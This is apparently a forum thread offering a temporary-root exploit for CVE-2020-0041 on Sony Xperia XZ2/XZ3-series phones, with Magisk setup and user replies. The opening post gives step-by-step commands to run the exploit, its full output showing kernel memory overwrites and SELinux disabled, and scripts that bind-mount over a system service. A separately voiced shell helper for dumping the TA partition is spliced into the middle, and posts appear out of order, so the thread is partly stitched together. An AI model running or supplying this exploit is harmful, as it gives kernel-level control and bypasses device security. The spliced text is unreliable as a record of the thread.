
[XZ2/XZ2c/XZ2p/XZ3] temp root exploit via CVE-2020-0041 including magisk setup


yangdongle

New member
May 14, 2012
3
0
@j4nn Can you build for the Japanese phone versions, such as SOV38, SO-05K, SOV37? Temp root is necessary for Japanese phones if you want to use VoLTE in my country!
 

Drie93

Member
May 5, 2013
30
3
Bekasi
Xperia XZ2
Tried to disable dm-verity 😁

Failed miserably 🤣🤣🤣
 


fuyuchip

New member
May 31, 2019
2
0
Will it work with the XZ2P Japanese version, like Au, Softbank, or Docomo?

Mod Edit (translated from Japanese):

For Japanese devices this is not possible as-is, so you need to change the ROM.

Flash this IBE firmware: H8116_Customized IBE_1313-3189_52.1.A.0.618_R3C.zip
Note, however, that if you install this ROM, functions such as Osaifu-Keitai will no longer be usable.
 

Sjll

Recognized Developer
Jun 4, 2017
521
613
Chongqing
I backed up some partitions which are not included in the stock firmware, before and after unlocking.
 

Attachments

  • xz3-lock.zip
  • xz3-Unlock.zip

Sacktreter

Member
Aug 24, 2015
33
26
I don't like English because I can't do it so well, so I translated into English with Google Translate. Original message in German as spoiler.

Are these the TA partitions and other important partitions that I need to back up to regain the functions I lose by unlocking the bootloader?

I don't want to unlock my bootloader, so I've already gotten quite far with this version.

I have temporary root rights; unfortunately this only works for a few restarts, and then the smartphone crashes continuously when I enter the last command "./magisk-start.sh -3".

- This is not a solution for daily use.

My goal is to not unlock the bootloader. But with the temporary root access I can install most root programs and set them up as I need. Adblocker and so on...

Unfortunately, I have to do without a root firewall, but with NetGuard Firewall I can live without root.

Many advantages nevertheless arise: all other programs, e.g. banking, PayPal, run perfectly, Bravia works, and everyone would be happy because no programs detect the root access when it is only temporary....

So we only need reliable root access in order to make a modification to the system from time to time. But I can't always take my laptop with me to grant root via the adb shell. One should be able to enter something in a terminal to get root briefly. That is a solution we should think about.

 
I bought my Xperia XZ2 (SOV37, single SIM) a few months ago, and I want to gain root access to back up my TA partition. I'm currently running firmware version 52.1.A.3.49 (Android 10, H8216 firmware; I got the phone with this firmware).

1. Can I use this method to gain root access?
2. About backing up the TA partition: I already tried backing up my TA partition using Sony Mobile Flasher by Androxyde (0.9.33.0). It backed up successfully, but I doubt whether I'm on the right track (I see 2 backup .TA files: 1.ta (TA partition 1) and 2.ta (TA partition 2), 12 kB and 837 kB). I also tried NewFlasher (also got the 2 .TA files, but in the dump 436 kB and 630 kB). Is there any "proper" way to back up the .TA files before proceeding with rooting or unlocking the bootloader?

Thanks in advance :D
 

MisterFynn

Member
Jan 19, 2018
39
1
Hey, I haven't tested it, but have you tried the app Termux?

Maybe it works, good luck.


 

mirhl

Senior Member
Oct 15, 2012
3,086
1,158
Friendly reminder I have a XZ2c holding back to October 2018 patch level for a reason.
 

junaid89

New member
Sep 12, 2010
2
0
I need to downgrade my XZ2P to H8116-52.1.A.0.618 so I can root it; can anybody provide it? XperiFirm only has the latest firmware.
 

Nulwyn

Member
May 19, 2021
7
0
Hi!
My XZ2 is on version 52.1.A.3.49. Can I install the UK firmware which is supported by this exploit even though the fw on my phone is from a Brazilian carrier? Would it cause any problem at all?
 

Yosiaryan

New member
Jun 10, 2021
4
1
CHANGELOG
  • 2020-05-14 : released initial version of tama-root (no magisk support, problem with 'Required key not available' returned from some commands)
  • 2020-05-22 : finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip

I tried to use a terminal emulator on Android and tried it, but I got this error: "/sbin read-only". What should I do?
 

Yosiaryan

New member
Jun 10, 2021
4
1
Thanks in advance for making this temp root work; sorry if my English is really bad. I'm trying to make a temp root on a Sony XZ2 with a terminal emulator, following a tutorial like the Sony XZ1 one,
by pushing busybox and configuring it exactly like on the Sony XZ1. I managed to get into the root shell and everything works normally with no error, but when I type ./magisk-start.sh -2 I get an error like this. Can you help me find a solution for this problem?
Thank you very much
 


Top Liked Posts

    temp root exploit for sony xperia XZ2/XZ2c/XZ2p/XZ3 with android 10 firmware
    including temporary magisk setup from the exploit


    The exploit uses CVE-2020-0041, originally designed for the Pixel 3 running kernel 4.9.
    I have adapted the Pixel 3 specific exploit to the kernel 4.9 used in sony TAMA platform phones running Android 10 with the February 2020 security patch level.

    SUPPORTED TARGETS
    This has been tested only with the xperia XZ2 H8216-52.1.A.0.618 target, but support for other targets has been implemented based on analysis of each kernel image from the target firmware.
    Please note, it is unlikely that any other fw version than those listed above would work.
    The only (unlikely) case where the exploit could work with a different fw version (or a different phone model) would be if it used a binary-identical kernel image in the firmware.

    USAGE HOWTO INCLUDING MAGISK SETUP
    • be sure to run a supported firmware version on your phone (you may need to downgrade, which involves a factory reset)
    • enable developer options and, in there, adb debugging (install adb drivers if needed)
    • download the tama-mroot.zip with the exploit attached to this post
    • download Magisk-v20.4.zip from the magisk releases page on github here
    • use 'adb push tama-mroot.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
    • unzip and prepare the magisk setup with the following commands in 'adb shell':
      Code:
      cd /data/local/tmp
      unzip tama-mroot.zip
      chmod 755 tama-mroot magisk-setup.sh magisk-start.sh
      ./magisk-setup.sh
    • get temp root and start magisk with the following commands in 'adb shell':
      Code:
      cd /data/local/tmp
      ./tama-mroot
      ./magisk-start.sh -1
      ./magisk-start.sh -2
      ./magisk-start.sh -3

    If it worked, you should see something like this:

    Code:
    H8216:/ $ cd /data/local/tmp
    H8216:/data/local/tmp $ ./tama-mroot                                                                                                                                                                            
    [+] Detected H8216-52.1.A.0.618 target
    [+] Mapped 200000
    [+] selinux_enforcing before exploit: 1
    [+] pipe file: 0xffffffd07822fa00
    [+] file epitem at ffffffd102da6d00
    [+] Reallocating content of 'write8_inode' with controlled data...............[DONE]
    [+] Overwriting 0xffffffd07822fa20 with 0xffffffd102da6d50...[DONE]
    [+] Write done, should have arbitrary read now.
    [+] file operations: ffffff9dee01ebf8
    [+] kernel base: ffffff9dece80000
    [+] Reallocating content of 'write8_selinux' with controlled data..[DONE]
    [+] Overwriting 0xffffff9def290000 with 0x0...[DONE]
    [+] init_cred: ffffff9def02fcd0
    [+] memstart_addr: 0xfffffff040000000
    [+] First level entry: ae7f6003 -> next table at ffffffd06e7f6000
    [+] Second level entry: ae419003 -> next table at ffffffd06e419000
    [+] sysctl_table_root = ffffff9def05c710
    [+] Reallocating content of 'write8_sysctl' with controlled data.......[DONE]
    [+] Overwriting 0xffffffd1316fc268 with 0xffffffd0ba748000...[DONE]
    [+] Injected sysctl node!
    [+] Node write8_inode, pid 7109, kaddr ffffffd0c1193700
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_selinux, pid 6726, kaddr ffffffd08bfeb400
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_sysctl, pid 6772, kaddr ffffffd0afc0d000
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Cleaned up sendmsg threads
    [+] epitem.next = ffffffd07822fa20
    [+] epitem.prev = ffffffd07822fad8
    [+] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1                                                                                                                                                    
    + FRESH=false
    + '[' -1 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + ./magiskpolicy --live --magisk 'allow dumpstate * * *'
    Load policy from: /sys/fs/selinux/policy
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2                                                                                                                                                    
    + FRESH=false
    + '[' -2 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=2
    + '[' 2 '=' 2 ']'
    + mount -t tmpfs -o 'mode=755' none /sbin
    + chcon u:object_r:rootfs:s0 /sbin
    + chmod 755 /sbin
    + cp -a magisk/boot_patch.sh /sbin
    + cp -a magisk/magiskboot /sbin
    + cp -a magisk/magiskinit64 /sbin
    + cp -a magisk/busybox /sbin
    + cp -a magisk/util_functions.sh /sbin
    + cd /sbin
    + chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
    + mkdir r
    + mount -o bind / r
    + cp -a r/sbin/. /sbin
    + umount r
    + rmdir r
    + mv magiskinit64 magiskinit
    + ./magiskinit -x magisk magisk
    + ln -s /sbin/magiskinit /sbin/magiskpolicy
    + ln -s /sbin/magiskinit /sbin/supolicy
    + false
    + chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
    + rm -f magiskboot util_functions.sh boot_patch.sh
    + ln -s /sbin/magisk /sbin/su
    + ln -s /sbin/magisk /sbin/resetprop
    + ln -s /sbin/magisk /sbin/magiskhide
    + mkdir /sbin/.magisk
    + chmod 755 /sbin/.magisk
    + >/sbin/.magisk/config
    + echo 'KEEPVERITY=true'
    + >>/sbin/.magisk/config
    + echo 'KEEPFORCEENCRYPT=true'
    + chmod 000 /sbin/.magisk/config
    + mkdir -p /sbin/.magisk/busybox
    + chmod 755 /sbin/.magisk/busybox
    + mv busybox /sbin/.magisk/busybox
    + mkdir -p /sbin/.magisk/mirror
    + chmod 000 /sbin/.magisk/mirror
    + mkdir -p /sbin/.magisk/block
    + chmod 000 /sbin/.magisk/block
    + mkdir -p /sbin/.magisk/modules
    + chmod 755 /sbin/.magisk/modules
    + mkdir -p /data/adb/modules
    + chmod 755 /data/adb/modules
    + mkdir -p /data/adb/post-fs-data.d
    + chmod 755 /data/adb/post-fs-data.d
    + mkdir -p /data/adb/service.d
    + chmod 755 /data/adb/service.d
    + chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
    + chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
    + /sbin/magisk --daemon
    client: launching new main daemon process
    + pidof magiskd
    + MP=14148
    + '[' -z 14148 ']'
    + >/sbin/.magisk/escalate
    + echo 14148
    + '[' -e /sbin/.magisk/escalate ']'
    + sleep 1
    + '[' -e /sbin/.magisk/escalate ']'
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3                                                                                                                                                    
    + FRESH=false
    + '[' -3 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=3
    + '[' 3 '=' 2 ']'
    + >/sbin/.magisk/magiskd
    + echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
    + chmod 755 /sbin/.magisk/magiskd
    + chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
    + getprop init.svc.dumpstate
    + SVC=''
    + timeout=10
    + '[' 10 -gt 0 ']'
    + stop dumpstate
    + killall -9 magiskd
    + stop dumpstate
    + mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
    + start dumpstate
    + timeout=10
    + '[' 10 -le 0 ']'
    + pidof magiskd
    + MP=14165
    + '[' -n 14165 ']'
    + break
    + stop dumpstate
    + sleep 1
    + umount /system/bin/dumpstate
    + rm -f /sbin/.magisk/magiskd
    + '[' '' '=' running ']'
    + rm -f /dev/.magisk_unblock
    + /sbin/magisk --post-fs-data
    + timeout=10
    + '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
    + sleep 1
    + timeout=9
    + '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
    + /sbin/magisk --service
    + sleep 1
    + /sbin/magisk --boot-complete
    + chmod 751 /sbin
    root_by_cve-2020-0041:/data/local/tmp # id                                                                                                                                                                      
    uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
    root_by_cve-2020-0041:/data/local/tmp # uname -a
    Linux localhost 4.9.186-perf+ #1 SMP PREEMPT Fri Jan 17 01:22:05 2020 aarch64
    root_by_cve-2020-0041:/data/local/tmp # getenforce                                                                                                                                                              
    Permissive


    Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager, or allow other apps that need root, since asking for root permission now works.
    The magisk setup from the exploit, including working permission asking, has been fully developed by me; it uses some novel techniques to overcome the limitations caused by magisk being run from a temp root instead of being integrated into the boot process as a service.

    Please be careful what you use the temp root for.
    Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), for example /system, /vendor or the kernel boot image, can result in a phone that no longer boots.
    This is why it is called 'temp root' - you get a root shell only temporarily, it is lost on reboot, and it does not allow making permanent changes to crucial partitions - you would need to unlock the bootloader for that.
    Some partitions might still be possible to modify - for example, in the case of sony xperia xz1 phones it was possible to do a permanent debloat via changes in the /oem partition, and such a debloat would survive even a factory reset. Similarly, some modem configs have been present in /oem, allowing to set up IMS for different operators/regions or tune other modem related stuff.

    Please note, this exploit will get you a root shell on still-locked TAMA platform phones, which could allow backing up the TA partition in the still-locked state, with the drm keys (the device key) still there. Backup of the TA partition now works with tama-mroot, avoiding the 'Required key not available' you could experience with the previously released tama-root.
    There is currently no known method, though, to restore drm functionality after bootloader unlock, even after restoring the TA partition from the locked-state backup.
    For details please check the 'exploiting xperia XZ2 - good and bad news' post and the following discussion there.

    SOURCES
    Exploit sources for all releases are available at my github here.

    CREDITS
    Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.

    DONATIONS
    If you like my work, you can donate using the Donate to Me button with several methods there.
    Thank you very much to all who donate.

    DOWNLOAD
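A host-side helper around the procedure in the post above (preflight check, push and setup, then a verified TA dump), added here as an example; it is not part of j4nn's tama-mroot or of Magisk. Beyond what the post states, it assumes that the firmware version and model are readable as the 'ro.build.id' and 'ro.product.model' properties, that the TA partition appears as /dev/block/bootdevice/by-name/TA, and that 'su' works from 'adb shell' once Magisk is up, as the post describes. Only the H8216-52.1.A.0.618 target the OP confirms testing on is listed; further MODEL-BUILD entries from the OP's supported-target list go into SUPPORTED. The backup step also answers the earlier question in this thread about a 'proper' TA backup, as far as a raw partition image goes: the partition is read twice and the image is kept only if both reads hash identically.

```shell
#!/bin/sh
# tama-workflow.sh - host-side helper around the tama-mroot procedure.
# Added example for this thread; not part of tama-mroot or Magisk.
# Assumptions not stated in the thread: the firmware version is exposed as
# ro.build.id, the model as ro.product.model, and the TA partition is at
# /dev/block/bootdevice/by-name/TA. Needs adb and sha256sum on the host.
set -eu

TMP=/data/local/tmp
EXPLOIT_ZIP=tama-mroot.zip
MAGISK_ZIP=Magisk-v20.4.zip
TA_DEV=/dev/block/bootdevice/by-name/TA

# Only the target the OP confirms testing on. Extend with further
# "MODEL-BUILD" entries from the OP's supported-target list.
SUPPORTED="H8216-52.1.A.0.618"

# supported_target MODEL BUILD -> succeeds if "MODEL-BUILD" is in SUPPORTED.
supported_target() {
    want="$1-$2"
    for t in $SUPPORTED; do
        [ "$t" = "$want" ] && return 0
    done
    return 1
}

# same_digest FILE1 FILE2 -> succeeds if both files have the same sha256.
same_digest() {
    a=$(sha256sum "$1" | cut -d' ' -f1)
    b=$(sha256sum "$2" | cut -d' ' -f1)
    [ "$a" = "$b" ]
}

# preflight: refuse to continue unless the attached phone is a tested target
# (the OP notes the exploit is unlikely to work on any other firmware).
preflight() {
    model=$(adb shell getprop ro.product.model | tr -d '\r')
    build=$(adb shell getprop ro.build.id | tr -d '\r')
    if supported_target "$model" "$build"; then
        echo "[+] $model-$build is a tested target"
    else
        echo "[-] $model-$build is not a tested target; downgrade first" >&2
        return 1
    fi
}

# setup: the non-interactive part of the OP's howto (push, unzip, chmod,
# magisk-setup.sh). The exploit itself is run interactively, because
# tama-mroot drops you into a root shell.
setup() {
    adb push "$EXPLOIT_ZIP" "$MAGISK_ZIP" "$TMP"
    adb shell "cd $TMP && unzip -o $EXPLOIT_ZIP && \
        chmod 755 tama-mroot magisk-setup.sh magisk-start.sh && ./magisk-setup.sh"
    cat <<EOF
Now run, inside 'adb shell':
  cd $TMP
  ./tama-mroot
  ./magisk-start.sh -1
  ./magisk-start.sh -2
  ./magisk-start.sh -3
EOF
}

# backup_ta OUTDIR: once Magisk is up ('su' works from adb shell), dump the
# TA partition twice and keep the image only if both reads agree.
backup_ta() {
    out="$1"
    mkdir -p "$out"
    for i in 1 2; do
        adb shell "su -c 'dd if=$TA_DEV of=$TMP/TA.$i.img bs=4096 && chmod 644 $TMP/TA.$i.img'"
        adb pull "$TMP/TA.$i.img" "$out/TA.$i.img"
        adb shell "su -c 'rm -f $TMP/TA.$i.img'"
    done
    if same_digest "$out/TA.1.img" "$out/TA.2.img"; then
        mv "$out/TA.1.img" "$out/TA.img"
        rm -f "$out/TA.2.img"
        sha256sum "$out/TA.img" > "$out/TA.img.sha256"
        echo "[+] TA backup written: $out/TA.img ($(wc -c < "$out/TA.img") bytes)"
    else
        echo "[-] the two TA reads differ; do not trust this backup" >&2
        return 1
    fi
}

case "${1:-}" in
    preflight) preflight ;;
    setup)     preflight && setup ;;
    backup-ta) backup_ta "${2:-ta-backup}" ;;
    "")        ;;   # no argument: only define the functions (sourcing/testing)
    *)         echo "usage: $0 preflight|setup|backup-ta [OUTDIR]" >&2; exit 2 ;;
esac
```

Run 'sh tama-workflow.sh setup' with the two zips in the current directory, do the interactive tama-mroot and magisk-start steps it prints, then 'sh tama-workflow.sh backup-ta ./ta-backup'. The dump goes through /data/local/tmp because adb pull runs as the shell user and cannot read the block device directly; the partition image is still a raw dump, not the unit-level .ta files that the flashing tools produce, so its size will differ from those.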

    implemented magisk setup from temproot

    finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip - get it here

    CHANGELOG
    • 2020-05-14 : released initial version of tama-root (no magisk support, problem with 'Required key not available' returned from some commands)
    • 2020-05-22 : finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip

    As it seems .618 fw versions are going missing from XperiFirm, please let me know if you need some - I still have the following:
    H8116_Customized IBE_1313-3189_52.1.A.0.618_R3C
    H8166_Customized FR_1313-2540_52.1.A.0.618_R4C
    H8216_Customized UK_1313-4679_52.1.A.0.618_R5C
    H8266_Customized FR_1313-2481_52.1.A.0.618_R4C
    H8296_Customized TW_1313-6119_52.1.A.0.618_R4C
    H8314_Customized FR_1313-2468_52.1.A.0.618_R4C
    H8324_Customized FR_1313-2469_52.1.A.0.618_R2C
    H8416_Customized IBE_1316-6423_52.1.A.0.618_R5C
    H9436_Customized FR_1316-3076_52.1.A.0.618_R6C
    H9493_Customized HK_1316-2331_52.1.A.0.532_R2C
    so I may upload it on request.

    So you did it again! You are insane, mate!!
    Respect.